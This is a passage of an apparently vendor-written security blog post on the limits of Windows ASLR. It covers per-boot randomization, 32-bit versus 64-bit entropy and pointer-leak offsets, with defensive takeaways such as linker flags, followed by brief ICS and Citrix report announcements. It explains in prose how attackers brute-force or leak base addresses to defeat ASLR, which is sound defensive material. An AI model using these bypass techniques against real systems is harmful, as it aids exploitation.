Clearly, these versions have been out of support for years and should be long gone from production use. The more important observation relates to software developers who support both legacy and modern Windows versions. They may not realize that the exact same program can be more secure or less secure depending on what OS version is running. Developers who (still!) have a customer base of mixed ASLR and non-ASLR supporting Windows versions should respond to CVE reports accordingly. The exact same bug might appear non-exploitable on Windows 10 but be trivially exploitable on Windows XP. The same applies to Windows 10 versus Windows 8.1 or 7, as ASLR has become more capable with each version.

Takeaway 1.2: Audit legacy software code bases for misguided ideas about preferred load addresses. 

Legacy software may still be maintained with old tools such as Microsoft Visual C++ 6. These development tools contain outdated documentation about the role and importance of preferred load addresses. Since these old tools cannot mark images as ASLR-compatible, a “lazy” developer who doesn’t bother to change the default DLL address is actually better off since a conflict will force the image to be rebased to an unpredictable location!

Fact 2: Windows loads multiple instances of images at the same location across processes and even across users; only rebooting can guarantee a fresh random base address for all images.

ELF images, as used in the Linux implementation of ASLR, can use position-independent executables and position-independent code in shared libraries to supply a freshly randomized address space for the main program and all its libraries on each launch—sharing the same machine code between multiple processes even where it is loaded at different addresses. Windows ASLR does not work this way. Instead, each DLL or EXE image gets assigned a random load address by the kernel the first time it is used, and as additional instances of the DLL or EXE are loaded, they receive the same load address. If all instances of an image are unloaded and that image is subsequently loaded again, the image may or may not receive the same base address; see Fact 4. Only rebooting can guarantee fresh base addresses for all images systemwide.

Since Windows DLLs do not use position-independent code, the only way their code can be shared between processes is to always be loaded at the same address. To accomplish this, the kernel picks an address (0x78000000 for example on 32-bit system) and begins loading DLLs at randomized addresses just below it. If a process loads a DLL that was used recently, the system may just re-use the previously chosen address and therefore re-use the previous copy of that DLL in memory. The implementation solves the issues of providing each DLL a random address and ensuring DLLs don’t overlap at the same time.

For EXEs, there is no concern about two EXEs overlapping since they would never be loaded into the same process. There would be nothing wrong with loading the first instance of an EXE at 0x400000 and the second instance at 0x500000, even if the image is larger than 0x100000 bytes. Windows just chooses to share code among multiple instances of a given EXE.

Takeaway 2.1: Any Windows program that automatically restarts after crashing is especially susceptible to brute force attacks to overcome ASLR. 

Consider a program that a remote attacker can execute on demand, such as a CGI program, or a connection handler that executes only when needed by a super-server (as in inetd, for example). A Windows service paired with a watchdog that restarts the service when it crashes is another possibility. An attacker can use knowledge of how Windows ASLR works to exhaust the possible base addresses where the EXE could be loaded. If the program crashes and (1) another copy of the program remains in memory, or (2) the program restarts quickly and, as is sometimes possible, receives the same ASLR base address, the attacker can assume that the new instance will still be loaded at the same address, and the attacker will eventually try that same address.

Takeaway 2.2: If an attacker can discover where a DLL is loaded in any process, the attacker knows where it is loaded in all processes. 

Consider a system running two buggy network services—one that leaks pointer values in a debug message but has no buffer overflows, and one that has a buffer overflow but does not leak pointers. If the leaky program reveals the base address of kernel32.dll and the attacker knows some useful ROP gadgets in that DLL, then the same memory offsets can be used to attack the program containing the overflow. Thus, seemingly unrelated vulnerable programs can be chained together to first overcome ASLR and then launch an exploit.

Takeaway 2.3: A low-privileged account can be used to overcome ASLR as the first step of a privilege escalation exploit. 

Suppose a background service exposes a named pipe only accessible to local users and has a buffer overflow. To determine the base address of the main program and DLLs for that process, an attacker can simply launch another copy in a debugger. The offsets determined from the debugger can then be used to develop a payload to exploit the high-privileged process. This occurs because Windows does not attempt to isolate users from each other when it comes to protecting random base addresses of EXEs and DLLs.

Fact 3: Recompiling a 32-bit program to a 64-bit one makes ASLR more effective.

Even though 64-bit releases of Windows have been mainstream for a decade or more, 32-bit user space applications remain common. Some programs have a true need to maintain compatibility with third-party plugins, as in the case of web browsers. Other times, development teams have a belief that a program needs far less than 4 GB of memory and 32-bit code could therefore be more space efficient. Even Visual Studio remained a 32-bit application for some time after it supported building 64-bit applications.

In fact, switching from 32-bit to 64-bit code produces a small but observable security benefit. The reason is that the ability to randomize 32-bit addresses is limited. To understand why, observe how a 32-bit x86 memory address is broken down in Figure 1. More details are explained at Physical Address Extension.


Figure 1: Memory addresses are divided into components, only some of which can be easily randomized at runtime

The operating system cannot simply randomize arbitrary bits of the address. Randomizing the offset within a page portion (bits 0 through 11) would break assumptions the program makes about data alignment. The page directory pointer (bits 30 and 31) cannot change because bit 31 is reserved for the kernel, and bit 30 is used by Physical Address Extension as a bank switching technique to address more than 2GB of RAM. This leaves 14 bits of the 32-bit address off-limits for randomization.

In fact, Windows only attempts to randomize 8 bits of a 32-bit address. Those are bits 16 through 23, affecting only the page directory entry and page table entry portion of the address. As a result, in a brute force situation, an attacker can potentially guess the base address of an EXE in 256 guesses.

When applying ASLR to a 64-bit binary, Windows is able to randomize 17-19 bits of the address (depending on whether it is a DLL or EXE). Figure 2 shows how the number of possible base addresses, and accordingly the number of brute force guesses needed, increases dramatically for 64-bit code. This could allow endpoint protection software or a system administrator to detect an attack before it succeeds.


Figure 2: Recompiling 32-bit code as 64-bit dramatically increases the number of possible base addresses for selection by ASLR

Takeaway 3.1: Software that must process untrusted data should always be compiled as 64-bit, even if it does not need to use a lot of memory, to take maximum advantage of ASLR.

In a brute force attack, ASLR makes attacking a 64-bit program at least 512 times harder than attacking the 32-bit version of the exact same program.

Takeaway 3.2: Even 64-bit ASLR is susceptible to brute force attacks, and defenders must focus on detecting brute force attacks or avoiding situations where they are feasible.

Suppose an attacker can make ten brute force attempts per second against a vulnerable system. In the common case of the target process remaining at the same address because multiple instances are running, the attacker would discover the base address of a 32-bit program in less than one minute, and of a 64-bit program in a few hours. A 64-bit brute force attack would produce much more noise, but the administrator or security software would need to notice and act on it. In addition to using 64-bit software to make ASLR more effective, systems should avoid re-spawning a crashing process (to avoid giving the attacker a “second bite at the apple” to discover the base address) or force a reboot and therefore guaranteed fresh address space after a process crashes more than a handful of times.

Takeaway 3.3: Researchers developing a proof of concept attack against a program available in both 32-bit and 64-bit versions should focus on the 32-bit one first.

As long as 32-bit software remains relevant, a proof-of-concept attack against the 32-bit variant of a program is likely easier and quicker to develop. The resulting attack could be more feasible and convincing, leading the vendor to patch the program sooner.

Fact 4: Windows 10 reuses randomized base addresses more aggressively than Windows 7, and this could make it weaker in some situations.

Observe that even if a Windows system must ensure that multiple instances of one DLL or EXE all get loaded at the same base address, the system need not keep track of the base address once the last instance of the DLL or EXE is unloaded. If the DLL or EXE is loaded again, it can get a fresh base address.

This is the behavior we observed in working with Windows 7. Windows 10 can work differently. Even after the last instance of a DLL or EXE unloads, it may maintain the same base address at least for a short period of time—more so for EXEs than DLLs. This can be observed when repeatedly launching a command-line utility under a multi-process debugger. However, if the utility is copied to a new filename and then launched, it receives a fresh base address. Likewise, if a sufficient duration has passed, the utility will load at a different base address. Rebooting, of course, generates fresh base addresses for all DLLs and EXEs.

Takeaway 4.1: Make no assumptions about Windows ASLR guarantees beyond per-boot randomization.

In particular, do not rely on the behavior of Windows 7 in randomizing a fresh address space whenever the first instance of a given EXE or DLL loads. Do not assume that Windows inherently protects against brute force attacks against ASLR in any way, especially for 32-bit processes where brute force attacks can take 256 or fewer guesses.

Fact 5: Windows 10 is more aggressive at applying ASLR, and even to EXEs and DLLs not marked as ASLR-compatible, and this could make ASLR stronger.

Windows Vista and 7 were the first two releases to support ASLR, and therefore made some trade-offs in favor of compatibility. Specifically, these older implementations would not apply ASLR to an image not marked as ASLR-compatible and would not allow ASLR to push addresses above the 4 GB boundary. If an image did not opt in to ASLR, these Windows versions would continue to use the preferred base address.

It is possible to further harden Windows 7 using Microsoft’s Enhanced Mitigation Experience Toolkit (commonly known as EMET) to more aggressively apply ASLR even to images not marked as ASLR-compatible. Windows 8 introduced more features to apply ASLR to non-ASLR-compatible images, to better randomize heap allocations, and to increase the number of bits of entropy for 64-bit images.

Takeaway 5.1: Ensure software projects are using the correct linker flags to opt in to the most aggressive implementation of ASLR, and that they are not using any linker flags that weaken ASLR.

See Table 2. Linker flags can affect how ASLR is applied to an image. Note that for Visual Studio 2012 and later, the ✔️flags are already enabled by default and the best ASLR implementation will be used so long as no 🚫flags are used. Developers using Visual Studio 2010 or earlier, presumably for compatibility reasons, need to check which flags the linker supports and which it enables by default.

Secure?

Linker Flag

Effect

✔️

/DYNAMICBASE

Marks the image as ASLR-compatible

✔️

/LARGEADDRESSAWARE /HIGHENTROPYVA

Marks the 64-bit image as free of pointer truncation bugs and therefore allows ASLR to randomize addresses beyond 4 GB

🚫

/DYNAMICBASE:NO

“Politely requests” that ASLR not be applied by not marking the image as ASLR-compatible. Depending on the Windows version and hardening settings, Windows might apply ASLR anyway.

🚫

/HIGHENTROPYVA:NO

Opts out 64-bit images from ASLR randomizing addresses beyond 4 GB on Windows 8 and later (to avoid compatibility issues).

🚫

/FIXED

Removes information from the image that Windows needs in order to apply ASLR, blocking ASLR from ever being applied.

Table 2: Linker flags can affect how ASLR is applied to an image

Takeaway 5.2: Enable mandatory ASLR and bottom-up randomization.

Windows 8 and 10 contain optional features to forcibly enable ASLR on images not marked as ASLR compatible, and to randomize virtual memory allocations so that rebased images obtain a random base address. This is useful in the case where an EXE is ASLR compatible, but one of the DLLs it uses is not. Defenders should enable these features to apply ASLR more broadly, and importantly, to help discover any remaining non-ASLR-compatible software so it can be upgraded or replaced.

Fact 6: ASLR relocates entire executable images as a unit.

ASLR relocates executable images by picking a random offset and applying it to all addresses within an image that would otherwise be relative to its base address. That is to say:

  • If two functions in an EXE are at addresses 0x401000 and 0x401100, they will remain 0x100 bytes apart even after the image is relocated. Clearly this is important due to the prevalence of relative call and jmp instructions in x86 code. Similarly, the function at 0x401000 will remain 0x1000 bytes from the base address of the image, wherever it may be.
  • Likewise, if two static or global variables are adjacent in the image, they will remain adjacent after ASLR is applied.
  • Conversely, stack and heap variables and memory-mapped files are not part of the image and can be randomized at will without regard to what base address was picked.

Takeaway 6.1: A leak of just one pointer within an executable image can expose the randomized addresses of the entire image.

One of the biggest limitations and annoyances of ASLR is that seemingly innocuous features such as a debug log message or stack trace that leak a pointer in the image become security bugs.  If the attacker has a copy of the same program or DLL and can trigger it to produce the same leak, they can calculate the difference between the ASLR and pre-ASLR pointer to determine the ASLR offset. Then, the attacker can apply that offset to every pointer in their attack payload in order to overcome ASLR. Defenders should train software developers about pointer disclosure vulnerabilities so that they realize the gravity of this issue, and also regularly assess software for these vulnerabilities as part of the software development lifecycle.

Takeaway 6.2: Some types of memory corruption vulnerabilities simply lie outside the bounds of what ASLR can protect.

Not all memory corruption vulnerabilities need to directly achieve remote code execution. Consider a program that contains a buffer variable to receive untrusted data from the network, and a flag variable that lies immediately after it in memory. The flag variable contains bits specifying whether a user is logged in and whether the user is an administrator. If the program writes data beyond the end of the receive buffer, the “flags” variable gets overwritten and an attacker could set both the logged-in and is-admin flags. Because the attacker does not need to know or write any memory addresses, ASLR does not thwart the attack. Only if another hardening technique (such as compiler hardening flags) reordered variables, or better, moved the location of every variable in the program independently, would such attacks be blocked.

Conclusion

Address space layout randomization is a core defense against memory corruption exploits. This post covers some history of ASLR as implemented on Windows, and also explores some capabilities and limitations of the Windows implementation. In reviewing this post, defenders gain insight on how to build a program to best take advantage of ASLR and other features available in Windows to more aggressively apply it. Attackers can leverage ASLR limitations, such as address space randomization applying only per boot and randomization relocating the entire image as one unit, to overcome ASLR using brute force and pointer leak attacks.

Overload: Critical Lessons from 15 Years of ICS Vulnerabilities

In the past several years, a flood of vulnerabilities has hit industrial control systems (ICS) – the technological backbone of electric grids, water supplies, and production lines. These vulnerabilities affect the reliable operation of sensors, programmable controllers, software and networking equipment used to automate and monitor the physical processes that keep our modern world running.

FireEye iSIGHT Intelligence has identified nearly 1,600 publicly disclosed ICS vulnerabilities since 2000. We go more in depth on these issues in our latest report, Overload: Critical Lessons from 15 Years of ICS Vulnerabilities, which highlights trends in total ICS vulnerability disclosures, patch availability, vulnerable device type and vulnerabilities exploited in the wild.

FireEye’s acquisition of iSIGHT provided tremendous visibility into the depth and breadth of vulnerabilities in the ICS landscape and how threat actors try to exploit them. To make matters worse, many of these vulnerabilities are left unpatched and some are simply unpatchable due to outdated technology, thus increasing the attack surface for potential adversaries. In fact, nation-state cyber threat actors have exploited five of these vulnerabilities in attacks since 2009.

Unfortunately, security personnel from manufacturing, energy, water and other industries are often unaware of their own control system assets, not to mention the vulnerabilities that affect them. As a result, organizations operating these systems are missing the warnings and leaving their industrial environments exposed to potential threats.

Click here to download the report and learn more.

Citrix XenApp and XenDesktop Hardening Guidance

A Joint Whitepaper from Mandiant and Citrix

Throughout the course of Mandiant’s Red Team and Incident Response engagements, we frequently identify a wide array of misconfigured technology solutions, including Citrix XenApp and XenDesktop.

We often see attackers leveraging stolen credentials from third parties, accessing Citrix solutions, breaking out of published applications, accessing the underlying operating systems, and moving laterally to further compromise the environment. Our experience shows that attackers are increasingly using Citrix solutions to remotely access victim environments post-compromise, instead of using traditional backdoors, remote access tools, or other types of malware. Using a legitimate means of remote access enables attackers to blend in with other users and fly under the radar of security monitoring tools.

Citrix provides extensive security hardening guidance and templates to their customers to mitigate the risk of these types of attacks. The guidance is contained in product-specific eDocs, Knowledge Base articles and detailed Common Criteria configurations. System administrators (a number of them wearing many hats and juggling multiple projects) may not have the time to review all of the hardening documentation available, so Mandiant and Citrix teamed up to provide guidance on the most significant risks posed to Citrix XenApp and XenDesktop implementations in a single white paper.

This white paper covers risks and official Citrix hardening guidance for the following topics:

  • Environment and Application Jailbreaking
  • Network Boundary Jumping
  • Authentication Weaknesses
  • Authorization Weaknesses
  • Inconsistent Defensive Measures
  • Non-configured or Misconfigured Logging and Alerting

The white paper is available here.